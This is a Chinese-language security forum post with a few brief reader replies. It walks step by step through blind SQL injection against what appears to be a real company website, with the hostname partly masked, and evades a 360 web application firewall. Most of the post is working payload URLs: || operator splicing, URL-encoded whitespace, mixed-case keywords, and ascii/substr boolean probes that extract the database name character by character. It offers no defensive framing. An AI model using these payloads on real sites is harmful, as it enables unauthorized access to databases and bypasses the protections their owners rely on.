首页
社区
课程
招聘
[原创]SQL注入下双WAF绕过
发表于: 2023-9-19 09:19 1450

[原创]SQL注入下双WAF绕过

2023-9-19 09:19
1450

利用HPP漏洞 参数污染
正常页面情况下

1
http://www.xxx.com.cn/productshow.php?id=79

图片描述
被360waf拦截

1
http://www.xxx.com.cn/productshow.php?id=79'

图片描述
进行隔断绕过

1
http://www.xxx.com.cn/productshow.php?id=79%20||%201=1

图片描述

关键字等价绕过
原因是使用&&进行连接时不需要进行闭合,流程为 id=1 然后继续执行 id=2 最后--+单行注释

进一步构造payload

1
http://www.xxx.com.cn/productshow.php?id=-79%20||%20length(database())>1

图片描述

判断数据库名长度判断

1
http://www.xxx.com.cn/productshow.php?id=-79%20||%20length(database())>10

图片描述

二分发进行发现是6

1
http://www.xxx.com.cn/productshow.php?id=-79%20||%20length(database())=6

图片描述

更近一步,就蹭蹭绝对不进去
这里失败了a-z都不行

1
http://www.xxx.com.cn/productshow.php?id=-79%20||%20left((select%20database()),1)=a

被waf拦截了

1
http://www.xxx.com.cn/productshow.php?id=-79%20||%20updatexml(1,concat(0x7e,(sElEct%a0user()),0x7e),1)

图片描述

使用ascii进行爆库

1
http://www.xxx.com.cn/productshow.php?id=-79%20||%20and%20(ascii(substr(database(),1,1))%20=109)

![[b891d28360cb0a22a713dcc78e16047.png]]
这里猜测应该是and问题,给他去掉

1
http://www.xxx.com.cn/productshow.php?id=-79%20||%20(ascii(substr(database(),1,1))=109)

图片描述
ascii判断出第一位是108

1
http://www.xxx.com.cn/productshow.php?id=-79%20||%20(ascii(substr(database(),1,1))=108)

![[Pasted image 20230304142131.png]]
所以对应的ascii表,这个第一个字符就是m了

剩下的不必多说
总结:
关键字等价绕过
ascii判断,and不行直接丢掉


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 4
支持
分享
最新回复 (4)
雪    币: 3059
活跃值: (30876)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
感谢分享
2023-9-20 10:37
1
雪    币: 2081
活跃值: (1716)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
非常直观的SQL注入用例
2023-11-16 08:16
0
雪    币: 218
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
4
感谢分享
2024-2-17 22:19
0
雪    币: 218
活跃值: (273)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
感谢分享  简单明了
2024-2-18 14:07
0
游客
登录 | 注册 方可回帖
返回
//